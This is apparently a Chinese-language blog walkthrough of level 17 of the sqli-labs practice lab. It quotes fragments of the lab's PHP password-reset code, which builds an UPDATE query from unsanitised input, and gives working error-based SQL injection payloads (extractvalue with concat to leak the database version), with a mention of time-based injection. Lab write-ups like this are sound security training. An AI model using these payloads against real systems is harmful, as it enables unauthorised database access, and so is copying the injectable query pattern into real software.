sqli-labs ————less -17

Less-17

sqli-labs ————less -17_第1张图片

源代码如下:





Less-17 Update Query- Error based - String



[PASSWORD RESET]
   Dhakkan
User Name      :     
New Password :    

'; $row1 = $row['username']; //echo 'Your Login name:'. $row1; $update="UPDATE users SET password ='$passwd' WHERE username='$row1'"; mysql_query($update); echo "
"; if (mysql_error()) { echo ''; print_r(mysql_error()); echo "

"; echo "
"; } else { echo ''; //echo " You password has been successfully updated " ; echo "
"; echo "
"; } echo ''; //echo 'Your Password:' .$row['password']; echo "
"; } else { echo ''; //echo "Bug off you Silly Dumb hacker"; echo "
"; echo ''; echo "
"; } } ?>

本关根据提示,我们可以看到是一个关于密码修改的过程,利用的是update语句,与之前用select时是一样的,我们需要将原来的闭合,构造属于自己的payload。

尝试报错:
username:admin

password:aaa'

sqli-labs ————less -17_第2张图片

从这里的amin”我们可以知晓对密码的处理过程中使用的是”。接下来我们可以使用盲注进行注入:

username:admin

password:aaa' and extractvalue(1,concat(0x7e,(select @@version),0x7e))#

sqli-labs ————less -17_第3张图片

这里只需要将@@version换成其他子句就可以进行其他的注入了。

这里也可以使用延时注入哦!


你可能感兴趣的:(【信息安全】,【渗透测试实战1】,———Sqli-labs实战)